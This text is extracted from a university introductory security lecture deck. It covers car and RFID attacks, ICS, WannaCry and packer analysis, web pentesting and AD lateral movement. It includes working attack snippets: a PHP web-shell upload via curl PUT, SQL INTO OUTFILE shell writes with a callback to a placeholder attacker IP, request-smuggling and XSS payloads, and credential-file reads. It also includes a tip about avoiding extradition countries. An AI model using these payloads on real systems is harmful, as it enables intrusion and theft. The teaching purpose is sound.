NCU2020 Information Security 101

NotSurprised @ NCU [email protected]

https://speakerdeck.com/notsurprised/ncu2020-information-security-101

> • Background • Penetration Test – Web/Host Scanning –
Escalate / persistence – Phishing Real-World Invading • Malware Analysis – Get Sample – Static Analysis – Dynamic Analysis • Tool Develop – Blue Team – Red Team – Real Tool • Extradition • Recon – Binary – Sitemap – OSINT • Vulnerability – User – Data – Host Machine • Combination – Combo Attack – POE – Post-Exploitation

> NotSurprised Intro • UCCU Hacker • AIS3 2016 trainee
• HITCON Defend 2018 3rd (etc.) • SITCON 2019 speaker • MOPCON 2019 speaker • LINE Becks.io#5 speaker • iThome CyberSec 2020 speaker • ITRI Engineer (serve my country) • 5-years Bachelor & Master of NSYSU Email : [email protected] Skill • Windows Kernel Driver (Minifilter) • Penetration Test (Web) • Malware Analysis (Ransomware) • Ethereum Smart Contract (Solidity) • Car Security (OMA DM)

• • •

> Ace Combat 7 : Skies Unknown

> credit : sky news

> • G-force – Ace pilot should tolerate 9G for
15s – If pilot cannot keep blood in head • Greyout • Tunnel vision • Blackout • G-LOC • Spoofing IFF (Identification, friend or foe) affiliation to single aircraft or AWACS

> credit :

> • Charlie Miller Jeep Cherokee – Charlie Miller share
series attack vectors • Tencent KeenLab Tesla Model S • ADCD Key Signal repeat – Proof that signals can be simply trigger and enhance to repeat received signals • PWN2OWN 2019 Tesla Model 3 • Car2go Auto Review Application in Chicago – This connect to server problem, review mechanism can be fraud and unlock the car with fake person id

> • RFID • CAN Bus • Bluetooth • Cellular
Network (Internet) • VANET • OMA DM

> Car Internal Communication Car external communication Key Manufacture server

> • RFID(Radio Frequency Identification), radio also • In vehicle,
long distance, usually in high frequencies, UHF root@kali:~# nfc-list nfc-list uses libnfc 1.7.1 NFC device: pn532_uart:/dev/ttyUSB0 opened 1 ISO14443A passive target(s) found: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 UID (NFCID1): 3c 3d f1 0d SAK (SEL_RES): 08 root@kali:~# nfc-mfsetuid 3c3df10d NFC reader: pn532_uart:/dev/ttyUSB0 opened Sent bits: 26 (7 bits) Received bits: 04 00 Sent bits: 93 20 Received bits: 0c 5c ee 0d b3 Sent bits: 93 70 0c 5c ee 0d b3 5c c2 Generate fake RFID key RFID Reader with Arduino

> • Signal Amplification Relay Attack • Original designed to
copy for backup and become all in one RFID key in personal used • Can copy 125 kHz (“low frequency”) RFID • Can not copy 13.56MHz (“high frequency”) NFC

> • Best way to get into CAN bus –
Compromise the car’s mini computer ( OS: QNX, Win CE, Linux, Android, Green Hills) – As a component in car, mini computer connect to CAN bus and dash board • Message on CAN bus system – CAN message format • ISO 11519-2 / ISO 11898:1993 / ISO 11898:1995 • Make largest privilege code in your broadcast packet – Diagnostic trouble code format • Sometime trigger automatic reaction • Aircraft also use CAN bus – Same problem that microcontroller is the last defend line in simple aircraft

> • CAN – ISO-TP (ISO 15765-4) – CANopen –
GMLAN bus • SEA J1850 – PWN – VPW • KWP – KWP2000 (ISO 9141-2) – ISO 14230-4 • LIN Bus • MOST – Independent from bus line, for IVI, connect to speaker and cellular network. • FlexRay • Ethernet

> credit :

> • FlexRay bus – Fastest – Expensive – Top
class car – Sensitive • CAN bus – Good CP value – Widely used credit :

> • OBDII (On-Board Diagnostic System II) ft. EcomCat credit
:

> ECOM2 OBDII Cable US $203.37 ValueCan3 OBDII Cable US
$395.00

> ELM327 OBDII Cable US $8.40~$2.50

> Expensive OBD2 Cable Cheap OBD2 Cable Normal Limited Usually
not Sometimes GUI / Auto Link Open Source / Self-defined High Low (china copycat) Yes No Lots None Yes None

> Some interesting tool: • ICSim: Instrument Cluster Simulator –
For Can

> • MyCar, CarDoctor, Car Scanner – Type of product
connect to OBDII and APP – Control your car’s status to prevent frauded by repair shop – Usually Bluetooth(shorter distance, more secure), WIFI/3G/4G – As IoT, default AC/PW remain problem – Bluetooth default paring key: 0000/1234 (sometime even not give a request)

> • Using uuid and handle (company identifier) primary and
characteristic command. • Sometime you can brutal force it or OSINT for hint. • MiBand2 no auth key, MiBand3 has breakable auth key.

> • Torque • Car scanner • OBD Auto Doctor

> • ELM327 OBD2 BLE • Cannot change PIN •
Support several client APP credit :

> • ELM327 OBD2 WiFi • Default IP & Port
• Support several client APP

> credit : Semantic

> • Not just Bluetooth, also using GPS and a
cellular connection to extend their range to anywhere with an internet connection. credit :

> • Acoount & Password is default in factoryBootstrap and
popular • User Guide which contain AC/PW public on internet – https://fccid.io/2AEB4AG21/User-Manual/User-manual-3104674 credit :

> • Such Vulhub website provide by MyCar Vendors credit
:

> • SQLi to other account and launch other’s car
engine by web API credit :

credit : BUG BUG CVE CVE MyCar Vendor MyCar Vendor
MyCar Vendor MyCar Vendor

> credit : Automotive Electronics

> credit :

> credit : LGACL Simulator

Vehicular Ad Hoc Network On-Board Unit, OBU Road Side Unit,
RSU • On board device to receive/send message system • Combined with sensors • microcontroller, speed sensor, brake sensor, radar, GPS, etc… • Road side sensor to receive/send message system • Has computing abilities • Co-work with OBU to make V2V communication happened • RSU can connect to central control center to make road state under control > credit : yenchih.kuo@NSYSU

• Communication between car：Vehicle to Vehicle, V2V • Communication between
car and road：Vehicle to infrastructure, V2I • Dedicated Short Range Communications (DSRC) • 5.85GHz~5.925GHz • Infrared、RFID、IEEE802.11p、IEEE1609 • in IEEE1609.x Wireless Access in the Vehicular Environment (WAVE) • Transmission Rate：3~27Mbps • Most Range：1km > credit : yenchih.kuo@NSYSU

> • Every sec, car will delivered its own basic
info. Including highway ID, delivered time, position, speed. • Attacker can overwrite Beacon info to make MDS make mistake. • Therefore, vehicle need to confirm pkg from valid node, and check checksum. VANET Attack can conclude into 5 phases: • Abnormal Data Check • Alert Check • Node Oriental Detecting Method • Data Oriental Detecting Method • Privacy

> In next section →

> • JTAG – A kind of debugging protocol, can
download and upload the firmware, find the PIN on manual • JTAGulator – A tool to help researcher find the JTAG PIN on chip credit : attify

> • SWD (serial wire debug) – A kind of
debugging protocol, support by STM32F4 series (STM32F4 is the most widely used car chip) • STM32F4 Discovery Kit – A debug tool provide by ST themself credit : st

> • IVI (In-Vehicle Information System) • MCU (Microcontroller Unit)
credit : iotm2mcouncil

> MobilePhone / Server HMI MicroController HTTP Modbus Canbus Device
PLC ECU No No / TLS1.2 No Strong Normal Weak Lots Few Few *Public Private *Public *Few *Few Lots Remote / Extranet Remote / Extranet Physical / Short-dist / Remote

> • Most are targeted attack • Vehicle security base
on close-source and inconsistency, just like OT • Revenue is totally different class in IoT device, worth targeted attack • As AI raise, automatous vehicle definitely need standards to connect to the road system and collect info for AI, therefore, it bring problems in security

• • •

> • HTTP sniffer than you will get the AC/PW
• Door seq. being shown on URL query as plaintext • Even you have no AC/PW, you can unlock most door remote by SQLi • There's a password to switch to setting mode on product’s user manual, you can find it on internet. e.g. #123456#

> • A human-readable JSON protocol “encrypted” with an easily
reversible autokey (-85) XOR cipher and a binary DES-encrypted configuration (AC/PW : admin/admin)

• • •

> • SCADA vs DCS – SCADA, Supervisory Control and
Data Acquisition System, cross fabs, work with DCS, PCS, ECS (network isolate?) – DCS, Distributed Control System, usually in same fab, but distribute control • IT (information technology): – Layer 5 Enterprise Network: • firewall, WAF, IPS, IDS – Layer 4 Enterprise server: • DMZ, AD server, Patch server, Web Server • OT (operation technology): – Layer 3 manufacturing operation & control: • FactoryTalk Server, Engineer Workstation – Layer 2 Area Supervisory control: • Router, switch, HMI, FactoryTalk Client – Layer 1 Control: • Batch Control, Safety Control, Driver Control, PLC – Layer 0 Process: • Sensor, Driver, Robot

> Level 5 Level 4 Level 3 Level 2 Level
1 Level 0 Enterprise Network Enterprise Servers Site Manufacturing Operation and Control Area Supervisory Control Control Process DMZ Email, Internet, etc. Web Services Application Servers Historian Mirror Firewall Terminal Services Patch Management Primary Historian Factory Talk Application Server Engineering Workstations Factory Talk Client HMI Factory Talk Client HMI Batch Control Discreate Control Driver Control Continuous Process Control Safety Control Actuators Drivers Sensors Robots

> Level 5 Level 4 Level 3 Level 2 Level
1 Level 0 Enterprise Network Enterprise Servers Site Manufacturing Operation and Control Area Supervisory Control Control Process DMZ Email, Internet, etc. Web Services Application Servers Historian Mirror Firewall Terminal Services Patch Management Primary Historian Factory Talk Application Server Engineering Workstations Factory Talk Client HMI Factory Talk Client HMI Batch Control Discreate Control Driver Control Continuous Process Control Safety Control Actuators Drivers Sensors Robots Information Technology Operational Technology

> • PLC Structure – CPU – 程式記憶體 Process Memory
– 系統記憶體 System Memory – 元件記憶體 Component Memory – 資料記憶體 Data Memory (最常被攻擊的位置, Usually) • Instances – 2010 伊朗 Stuxnet – 2014 德國煉鋼 German Steel 日本文殊 Japan Fugen Nuclear – 2015 烏克蘭核電廠 Ukraine Nuclear – 2018 臺積電 TSMC • CyberX Report – 57% AntiVirus cannot update VirusHash DB – 53% still use WinXP

> • ICS Protocols – At least hundreds – Few
open resource – No sharing with self-defined protocols (even diff types in same company) – Fieldbus, wireless, RS232 serial port frequency, etc… • Modbus TCP – Modbus structure like TCP – Major part is Function Code – Function Code only has few code defined in protocol, vendors can still use alternative codes (self-defined) – New Version will include HTTPS

• • •

> • DEFCON27 DEVCORE Principle Researcher Orange & Researcher Meh
find SSL VPN vulnerability • Win the “Pwnie Awards” (Oscar in Information Security)

• • •

> Remote Code Execution • Vulnerabilities on existed services •
No need with click bait • Usually need PoE from user privilage Phishing • Picnic (problem in chair, not in computer) • Need click bait • Usually also get AD privilege with click bait (UAC)

• • •

> Victim Email Victim

> Hacker Server Hacker Server

> ↑ ↓

> Victim Victim

• • •

──

> • Microsoft Server Message Block 1.0 (SMBv1) server handles
certain requests • tcp port 445 • srvnet在接收包的時候就會在a1字節後存放0xffdff000指標，而 0xffdff000這個地址存入客戶端發送來的資料。 • srv.sys 在處理 SrvOs2FeaListSizeToNt 的時候邏輯不正確導致複製貼上越界覆蓋，造成可執行shellcode。 unsigned int __fastcall SrvOs2FeaListSizeToNt(int pOs2Fea) { …… Length = *(_DWORD *)pOs2Fea; …… *(_WORD *)pOs2Fea = pBody - pOs2Fea; …… } Typical Ransomware Eternal Blue = WannaCry

> • 首先關閉指定進程，避免某些重要文件因被佔用而無法感染。(Mail跟DB)

> • 木馬在網絡上設置了一個開關，當本地計算機能夠成功訪問 http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 時，退出進程，不再進行傳播感染。

> I’m About to End This Ransomware!!!

> Step 1. 收集病毒情報 • 疫情、感染範圍、發作情形、併發症狀 Step 2. 收集病毒樣本 •
分辨是下載器還是病毒本體 • 足夠的初階樣本分析可以有效提升對高階樣本混淆的推測直覺 • 根據批露資料自撰病毒樣本 (記得不要 open source) Step 3. 靜態分析 • 反組譯拆解: 監測模組、持續性模組、傳播模組、反連模組 Step 4. 建立檢測環境 • 建立 fake C&C server (如果有需求) • 設置激活開關 (IP位置、具漏洞之Service) • 模擬受害情境 (一般使用者、IoT、產線HMI/PLC、Server) Step 5. 動態分析 • 掛載啟動 Log/Debug 功能的所有工具 (syscalls、network) • 想辦法回收數據 (BSoD、Encrypt、ForceReboot)

> • MoWare ransomware & Franzi ransomware

> IAT existed API directly calling No shell pack No
obscuration Source comparable IAT destroyed API magic calling Heavy shell pack Lots obscuration BlackBox

• • •

> • 惡意樣本為了避免被鑑識常常會檢查當下機器狀態 – 虛擬機設置 – 除錯模式 – 沙箱版本
• 當然還有一些混淆寫法編譯後的函式呼叫方式

> • 同家族 data structure (collapsed, need fix) • 結構、項目量、不同
Developer 具有微妙差異可分辨家族 (很多時候還是很難分辨)

> • 不同家族 data structure

> • 同家族 call flow 67f49ece27415c9646ddf5aa3037d67e28b2252d0d2c577e7e89c5ec2154b0bc cf262a9236eaf5230c219845823f36fd8c8e8b77ba882c34ce38a5087539cf71

> • 不同家族 call flow 具有一定程度的反逆向保護，所以無法完整生成 call graph (考驗逆向功力的時刻)

> • 混淆技術 (obscuration)： – 將程式的代碼，轉換成一種功能上等價，但是難於閱讀和理解的形式 • 加殼技術 (shell packer)：
– 一種對EXE檔案的數據壓縮及加密保護，可自我解壓檔案，並能隱藏解壓進程 – 有些加殼還會加上混淆的技術或概念，例如 VM Shell 將 ASM 完全加密，只剩 FDE • 2006 年時就有 80%~90% 的惡意軟體使用加殼技術，其中 50% 使用大眾技術或舊加殼，但相信現在這比率更高。使用 Entropy、Signature、 PE header 偵測加殼等方式皆有缺陷。防毒軟體對於任何新出的加殼技術防禦能力較低 • 混淆是所有良性軟體開發者與惡意軟體開發者的基本要求，一定程度的混淆能減少開發技術被解譯拷貝竊取

> • Save Load 大法 – 將真實指令位置存在 Stack 上，然後在需要時讀出使用 •
流程混淆 – 跟甩開跟蹤的繞路一樣，運用一些等價但反組譯辨認較弱的跳轉或 register 搬移使反組譯結果無法直視 ( eg. call xxx = push retAddr; push xxx; ret ) • 字串混淆 – 初階的換編碼，進階的會用算的生成字串 • 反ASM2C – 藉由一些反組譯工具在辨認上會誤會的技巧來使工具無法順利反組譯成 C code • IAT (import address table) – 破壞 IAT 可避免被快速看出意圖並且增加靜態查找 entries 困難，藉由動態計算偏移重新填入 IAT 使程式運行 • Structure Exception Handling (SEH) – try, exception, __finally 跟 SL 大法類似，返回錯誤點重新執行，只是 Jump 的目的是自建予 CPU 的 IDT List (TIB fs:[0])，另外這種 JUMP 不用 Jmp、Jl、Je 等 ASM，而 Catch Handler 還可於被反編回 C 時被工具視為無用而捨棄(然而異常處理仍可被執行) – 某些時候可供病毒用來偵測是否掛載了 debugger

> • UPX – UPX 是一個以 command line 方式操作的免費壓縮軟體，使用一種叫做 UCL
的壓縮算法。UCL 最大的好處就是在壓縮及解壓縮的過程中不需要額外的內存，UPX 目有 DOS、Linux 以及 Windows 版本。 • Armadillo – 是一款應用面很廣的商業殼，可以為程式加上使用時間，次數以及啟動畫面等設定，他的保護功能其中一項稱為 Nanomite。 – Nanomite 技術能夠標記某些程式區段，將這些區段做混淆並寫入記憶體中。對於原本應該是這些程式碼所在的地方則改為 jump。在壓縮前殼再將這些 jump 改為 int 3（op code 為 0xCC）的程式中斷點並紀錄這些標記。 – Import table Elimination 也是 Armadillo 使用的技術之一。由於分析師能夠依據程式 import table 裡的 APIs 猜測到這隻程式的意圖，破壞原本程式的 import table 就能夠增加反編譯的困難。這項技術在私有殼中也十分常見。 • VM Protector – 以類似於 Java、Python 的 VM Agent (FDE) 來解譯每行加密過的 ASM (vOpCode) 指令。

• • •

> Free EDR • SysMon • Wazuh Windows Tools •
Process Monitor • Process Explorer • Procexp • Autoruns NetWorkSniffer • MITM Proxy • TCPViewer • Nirsoft TCPLogView(有log)

> ANY.RUN

• • •

> • • • • • •

> Windows ~= Microkernel + LibOS ~= Monolithic Like

> • Extension Register • Kernel Dispatcher • CommunicationUK •
Degree (Altitude) • Events • Handlers

• • •

> • • • • • • • •

• • •

> • • • • •

> • Signal Amplification Relay Attack • Original designed to
copy for backup and become all in one RFID key in personal used • Can copy 125 kHz (“low frequency”) RFID • Can not copy 13.56MHz (“high frequency”) NFC

• • •

> 避開自身隸屬國家或具引渡條例之國家

• • •

> • ASM executable -> C • IDA pro [f15]
Cpp source IDA Pro disassembling to C IDA Pro ASM Binary

> • .Net executable -> C# • Telerik Just Decompiler

> • .pyc -> .py • Uncompyle6

> • UPX – UPX 是一個以 command line 方式操作的免費壓縮軟體，使用一種叫做 UCL
的壓縮算法。 UCL 最大的好處就是在壓縮及解壓縮的過程中不需要額外的內存，UPX 目有 DOS、Linux 以及 Windows 版本。 • Armadillo – 是一款應用面很廣的商業殼，可以為程式加上使用時間，次數以及啟動畫面等設定，他的保護功能其中一項稱為 Nanomite。 – Nanomite 技術能夠標記某些程式區段，將這些區段做混淆並寫入記憶體中。對於原本應該是這些程式碼所在的地方則改為 jump。在壓縮前殼再將這些 jump 改為 int 3（op code 為 0xCC）的程式中斷點並紀錄這些標記。 – Import table Elimination 也是 Armadillo 使用的技術之一。由於分析師能夠依據程式 import table 裡的 APIs 猜測到這隻程式的意圖，破壞原本程式的 import table 就能夠增加反編譯的困難。這項技術在私有殼中也十分常見。 • VM Shell – 以類似於 Java、Python 的 VM Agent (FDE) 來解譯每行加密過的 ASM (vOpCode) 指令。

> OEP SEP Orginal Entry Point Shell Entry Point

> B83D6458 778137EC 00732218 778786D0 006DFA24 CFC00910 006DFA44 006DFA48 006DFA4C
006DFA50 006DFA54 006DFA58 <Unknown vOpCode> <Unknown vOpCode> <Unknown vOpCode> <Unknown vOpCode> <Unknown vOpCode> <Unknown vOpCode> EIP VM Shell vOpcode decoder Data c3 006DFA44 ret

• • •

> • 以Web來說，地毯式掃描的目標除了近乎已知的80/443，重要的是: – FTP - 用於上傳網站檔案 –
SQL - 動態網站資料庫 – SSH - 遠端登入修改網站 – RDP - 遠端登入修改網站 – SMB - 用於上傳網站檔案

> • 有許多API或是微服務的位置處於SubDoamin，且於轉址中一瞬即逝，需要工具紀錄。 • 因為認證與接收值的位置通常在這些地方，會比一般使用者接觸的網頁表面更多潛在漏洞。

> • 有許多框架的後台服務幾乎是與前台網站切割開的，無法藉由前端爬蟲找到入口。 • 使用框架字典進行路徑爆破可以找到後台位置。

• • •

country:"Taiwan" city:"Taichung" IP Webcam Server

insecam

• • •

> 爆破常用字詞丟入hashcat搭配Hob0Rules生成密碼 • 姓名 • 生日 • 身分證字號 • 常用信箱
• 工號 • 公司英文縮寫 hashcat --stdout password.txt -r /usr/share/hashcat/rules/hob064.rule -o password-new.txt --force • 反向 –r • 大寫 –u • 小寫 -l • 末尾加字符 -$ITRI • 開頭加字符 -^ITRI • 重覆2次 –p2

• • •

> • 疊透明按鈕在引用的網頁畫面上方

> • 建立區域性釣魚網站跳轉劫持來的登入頁面。 • 可搭配Self-XSS在劫持來的Form加入 Hidden iframe 本區域警示網站資料引用自政府民生物聯網。 ※偷取到一次來自使用者自發點擊的執行能力

> ( ) • Stored-XSS – 儲存於網站資料庫，影響所有瀏覽用戶

> • ?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPrope rtyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert()')()}}

> • Philips Hue lighting system Login User Other User

> • TP-LINK Smart Plug

> www.itriweb.org/login.php itriweb.org User 1. User Login 2. AC/PW 3.
Cookie

> Hacker Own www.itriweb.org/login.php itriweb.org User 1. User Login 2.
AC/PW 3. Cookie www.coupon.com/index.php 4. Open Url

> www.coupon.com/index.php

> www.itriweb.org/login.php itriweb.org User 1. User Login 2. AC/PW 3.
Cookie www.coupon.com/index.php 4. Open Url Hacker Own 5. Cookie & ChangeAccountUrl

> • API Token in the request form, not only
login Token. • Check request’s referer in header. • Also setting HTTPONLY flag to prevent XSS steal the cookie from user.

> Request URL from User by Server

> Private Network Server (e.g. FTP, Mail Server) Hacker URL
Dealer (e.g. Hyperlink, Graph) X Firewall (e.g. WAF, IPS, DMZ)

> Private Network Server (e.g. FTP, Mail Server) Hacker URL
Dealer (e.g. Hyperlink, Graph) Firewall (e.g. WAF, IPS, DMZ)

> • 在 HTTP1.0 之前的協議設計中，客戶端每進行一次HTTP請求，就需要同一個服務器建立一個TCP鏈接。而現代的網站頁面是由多種資源組成的，我們要獲取一個網頁的內容，必須要請求HTML文檔，還有JS，CSS，圖片等
多種的資源，這樣如果按照之前的協議設計，就會導致HTTP服務器的負載增加。於是在 HTTP1.1 中，增加了 Keep-Alive和Pipeline這兩個特性。 No Pipelining Client Server Pipelining Client Server Open Open Close Close

> • Transfer-Encoding (TE) POST /xxx HTTP/1.1 Host: xxx Content-Type:
text/plain Transfer-Encoding: chunked 4\r\n Wiki\r\n 5\r\n pedia\r\n e\r\n in\r\n\r\nchunks.\r\n 0\r\n \r\n Header Body 1st chunk 2nd chunk 3rd chunk chunk close Length Content

> Keep-Alive Client Middleware Server No Pipelining req A req
B req C req A req B req C resp A resp A resp B resp B resp C resp C Backend (e.g. LAMP) User Middleware (e.g. CDN, Proxy)

> printf 'GET / HTTP/1.1\r\n'\ 'Host: localhost\r\n'\ 'Content-length: 58\r\n'\ 'Transfer-Encoding:
chunked\r\n'\ 'Token: YYYYYY\r\n\r\n'\ '0\r\n'\ '\r\n'\ 'GET /API HTTP/1.1\r\n'\ 'Host: localhost\r\n'\ 'Dummy: Header\r\n'\ '\r\n'\ 'GET /info HTTP/1.1\r\n'\ 'Host: localhost\r\n'\ 'Token: XXXXXX\r\n'\ '\r\n'\ | nc –q1 127.0.0.1 8787 GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF] Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Header[CRLF][CRLF] GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF]

> (ignored or removed) (start of 58 bytes of body
with 0) (end of 58 bytes of body, not parsed) Body Header Middleware Content-Length first. GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF] Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Header[CRLF][CRLF] GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF]

> GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF]
Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Header[CRLF][CRLF] GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF] Backend Transfer-Encoding first, in RFC 7230 (Chunk End)

Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Header[CRLF][CRLF] GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF] (Chunk End) Backend Transfer-Encoding first, in RFC 7230 (sending payload, replace /r/n here.)

> (ignored or removed) (start of 58 bytes of body
with 0) (end of 58 bytes of body, not parsed) Body Header Middleware Content-Length first. GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF] Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Headerxxxx GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF]

Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Headerxxxx GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF] (Chunk End) Backend Transfer-Encoding first, in RFC 7230 (sending payload, replace /r/n here.)

Backend (e.g. LAMP) User Middleware (e.g. CDN, Proxy) Hacker

Backend (e.g. LAMP) User Middleware (e.g. CDN, Proxy) Hacker POST
Token POST Token

Backend (e.g. LAMP) User Middleware (e.g. CDN, Proxy) Hacker POST
Token Pass Unauthenticated API request POST Token API Request

• • •

> • curl -v -X OPTIONS http://192.168.227.134/test/

> • curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>'
http://192.168.227.134/test/shell.php

> Replace Existed Page with Reverse Shell

• • •

> Read File /etc/passwd /.ssh/id_rsa Brutal-Force Passwords with Accounts Use
key to SSH Upload Script Try to make a reverse shell e.g. ssh [email protected] –i id_rsa

> Read File SQLi /var/www/web /connect.config Sell Data DataBase e.g.
SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/shell.php’ SELECT load_file('\\\\YOUR.IP.GOES.HERE\\shell.php’); SELECT sys_exec('usermod -a -G admin UserA'); Try to make a reverse shell DoS e.g. SELECT * From TableA, TableB, TableC, TableD, TableE, TableF; $$

> • select sys_exec('usermod -a -G admin UserA');

> baike.baidu.com/login.php User 1. User Login 2. AC/PW 3. Cookie
www.coupon.com/index.php 4. Open Url Hacker Own Self-XSS + CSRF 5. Cookie & Edit Self-XSS and Trigger baike.baidu.com 6. Retrieve Baidu bduss (core cookie)

> • Wordpress CVE-2019-6977 Crafted Image 2. Through Dir write
file [_wp_attached_file] & [Edit] 1. Login to admin panel Theme Folder 3. Template Include [_wp_page_template] Return Shell Arbitrary WriteFile + Local File Including

> • Mongo-express CVE-2019-10758 Unauthenticated API + Command Injection

• • •

> • User • Shellcode • Root

• • •

> • June 2017: Ransomware attack on Maersk • June
2018: NotPetya attack on Saint-Gobain • March 2019: LockerGoga attack on Norsk Hydro • May 2019: RobinHood attack on Baltimore City

> credit: Unknown

credit: backlion

> • 內對內未做網段隔離 • 重要主機對內無防護措施可輕易橫向移動 • 未設置 RDP gateways •
可以遠端執行程式的服務(WRM, WMIC, PSEXEC, RDP)未管控登入與登入者群組以及權限 • 未限制可遠端登入上列服務(WRM, WMIC, PSEXEC, RDP)之網域範圍 • 未設定 GPO 降低上述具遠端執行能力之服務的 timeouts sessions • 重要主機控管登入權限未搭配 Multi-factor Authentication，如 SmartCard 或計算而來的 Token • 因方便而使單一使用者具備多機器的 Local Administrator 權限

> • 以Event來說，Remote Access 通常分 "建立連線", "認證", "登入" • 認證的授權分為只有帳密或是帳密帶
Token 的 • 使用 SmartCard 為輸入 Token 的一種方式，其他有 NTLM、Kerberos 兩種認證方式 • SmartCard長期連接未卸除，可由遠端 HelpDesk admin 竊取 Token • 駭客可用 Mimikatz 盜取 NTLM 的 Hash 來執行 WRM, WMIC, PSEXEC • 駭客可用 Mimikatz 盜取機器 Hash 來請 DC 產生 Kerberos Ticket 用以通過 Kerberos 認證 .#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/

> credit: BloodHound

• • •

> Real Network Force • USA NSA • China APT3
(a.k.a. Gothic Panda) • Russia APT28 (Hillary Clinton campaign) • Vietnam APT32 (a.k.a. SeaLotus, Toyota global incident) • TW 資通電軍, 調查局資訊科學組, 國安局資訊組

> 國內資安會議 • HITCON CMT • HITCON Pacific • TDoH
conf • DEVCORE conf (篩選制) • 國際資訊安全組織台灣高峰會 • iThome資安大會國外資安會議 • SECCON (JP) • CodeBlue (JP) • CCC (GM) • DEFCON (US) • BlackHat (Global: USA、Asia、神州、Europe) 國內技術研討會 • COSCUP • SITCON • MOPCON • PYCON TW • RubyCON • JSDC • RedHat Taiwan • Symantec Taiwan • DevOpsDaysAsia Taipei • vForumTW

> & • 教育部 AIS3 暑期訓練營 – 仿造韓國 BoB 的資安訓練營，有線上前測，前
180 名可進訓練名單，限我國在學生 • 臺灣好厲駭年度個別指導計畫 – 1:1 進行指導，老師多為 chroot 組織成員與專業教授或是知名駭客，限我國在學生 • 中科院 AEGIS – 初辦題目較為通靈，近一洗前風，要求 8 小時內解完極困難有條理的題目 (尤其是 Pwn)，甚至 Misc1 也是混和整整五道常見手法成一題的超級混和題 • 金盾盃資安競賽 – 以選擇題前測初篩，KoF 為決賽的競賽，少數非 Jeopardy 競賽，限我國在學生 • 國網 IoT 競賽 – 以上市或未上市的實體產品進行比賽測試，挑戰檢測能力與證明挖掘以及報告撰寫能力 • 國網 Red Alert 72 – 以 Defense 為主的競賽，搭配些許 Jeopardy 做基本分數 • HITCON CTF – 我國最權威資安競賽，也是世界屈指可數權威競賽，亦為世界大賽 DEFCON 之種子賽所有線上Jeopardy，全球戰隊積分與競賽預定時程 • TrendMicro CTF – HITCON CTF 種子賽 • AIS3 EoF – AIS3 的年尾嘉年華競賽，前身 AIS3 Final 為 HITCON CTF 種子賽 • MyFirstCTF – 適合高中職生的CTF，多考古變形 • BreakAll-CTF – 適合高中職生的CTF，多考古變形

> • WikiPedia x86 / x86_calling_conventions / x86… • Wikibooks
x86 Assembling • 看雪論壇文章集結本【加密與解密】 • 【The Shellcoders Handbook】【Hacking:The Art of Exploitation】 • CTFtime 上關於 Pwn、Reversing 的 WriteUps • Online PWN CTF – Pwn.kr 練習網站由淺入深、Pwn.tw 經典題目收集網站、OverTheWire • Online Reversing CTF – RingZer0team/Reversing • 52pojie 工具推薦、插件推薦與精華文 • TalkSlides: – AngelBoy1(HITCON 217)、SeanWu(HITCON 217)、aaaddress1(TDoH)、 AsukNakajima(SECCON)、VinceChen(MTK)、ss8654twtw(BFKinesiS)、 frozenkp (BambooFox)

> & • HackerPlayBook v2 • HackerPlayBook v3 • Kali
Linux 滲透測試工具第二版 • 白帽子講Web安全 • The Browser Hacker’s Handbook駭客攻防聖經 • Windows Internals, System architecture, processes, threads, memory management, and more, 6/e • Windows Internals, System architecture, processes, threads, memory management, and more, 7/e

> Static Reversing • IDA pro • Ghidra • Snowman
• Hopper Dynamic Debugger • Ollydbg • CheatEngine MetaData • ExifTool • Peview • Petool • Winhex • HexWorkshop • WinHex • Stud_PE UnPacker • PEiD Dynamic Logger • Elasticsearch + Moloch • MITM Proxy • TCPViewer • Nirsoft TCPLogView(有log) • Procexpa • MemMon • Vmmap • DPerfLite • IRPMon • SdtViewer

> • ANY.RUN: https://app.any.run/submissions • Contagio Malware Dump: http://contagiodump.blogspot.com/ •
